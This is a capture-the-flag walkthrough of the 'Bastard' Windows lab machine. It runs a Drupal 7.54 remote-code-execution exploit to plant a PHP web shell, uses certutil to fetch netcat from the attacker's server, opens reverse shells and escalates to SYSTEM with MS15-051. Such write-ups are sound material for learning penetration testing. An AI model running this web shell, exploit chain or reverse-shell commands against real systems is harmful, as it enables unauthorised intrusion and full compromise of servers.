Name Bastard
OS Windows
RELEASE DATE 18 Mar 2017

Port Scan

# Nmap 7.92 scan initiated Fri Apr 29 19:20:38 2022 as: nmap -p- -oN scriptScan.nmap -v -sVC
Nmap scan report for
Host is up (0.078s latency).
Not shown: 65532 filtered tcp ports (no-response)
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-title: Welcome to |
|_http-generator: Drupal 7 (
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Going to the webpage it looks like it is a drupal site


From the nmap output, there was a /robots.txt page. Taking a look at that file there was a disallow entry for /CHANGELOG.txt this probably has version information about the drupal site.

The changelog indeed does show the version to be “Drupal 7.54, 2017-02-01”


Googling “Drupal 7.54” exploit brings me to this site explaining that there is an RCE

It tells us to copy over the exploit using searchsploit -m php/webapps/41564.php and make a few changes to the first part of the exploit


define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');

$url = '';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'test.php',
    'data' => '<?php echo"Zonifer Rocks"; ?>'

Before we run the exploit we need to install php-curl by running sudo apt-get install php-curl. Once that is installed we can run the exploit php 41564.php, and now by going to we can see that the exploit works!


We can take this a step further and run commands on the server by making a few changes to our exploit

$url = '';               
$endpoint_path = '/rest';                  
$endpoint = 'rest_endpoint';               

$phpCode = <<<'EOD'                        


 if (isset($_REQUEST['fupload'])) {                                                   
   file_put_contents($_REQUEST['fupload'], file_get_contents("" . $_REQUEST['fupload']));                                                            

 if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";



$file = [
    'filename' => 'cmd.php',
    'data' => $phpCode

Now going to gives us code execution!


We can now use a netcat windows executable and get a reverse shell. First, we can locate the binary using locate, any one of these should work. I used this one

└─$ locate nc.exe

We will copy it to our working directory cp /home/kali/tools/netcat-1.11/nc.exe, and start a python web server to host it python3 -m http.server 80. Next, we will use certutil.exe and our simple web shell to download the file from kali onto the host. We can see that it downloaded by looking at our python webserver

└─$ python3 -m http.server 80  
Serving HTTP on port 80 ( ... - - [29/Apr/2022 23:29:21] "GET /nc.exe HTTP/1.1" 200 - - - [29/Apr/2022 23:29:22] "GET /nc.exe HTTP/1.1" 200 -

Next, start up a listener for the shell nc -lvnp 9001 and execute this in the browser to get a connect back If we look back at our listener we can see that we now have a shell as iusr

└─$rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 64544
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

nt authority\iusr


Let’s see what kind of windows machine this is by running systeminfo. From the snip below it is a windows server 2008 R2 server on a 64-bit architecture.

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 
System Boot Time:          1/5/2022, 1:30:52 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

There is a good GitHub repo called SecWiki that has a directory for windows kernel exploits. Looking through the page MS15-051 looks like it might work on this machine. I will download the zip file and extract ms15-051x64.exe to my working directory.

Next, we need to copy it over to the machine certutil.exe -urlcache -f exploit.exe (while still having our python web server running).

And now we can test and see if it works

[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2492 created.
nt authority\system

We can now execute code as nt authority\system! We can use netcat again to get a reverse shell, but this time as system. Make sure to set up a netcat listener to catch the shell nc -lvnp 9002 and now we can execute exploit.exe "nc.exe 9002 -e cmd.exe"

Once it is finished we have a shell as system!

nt authority\system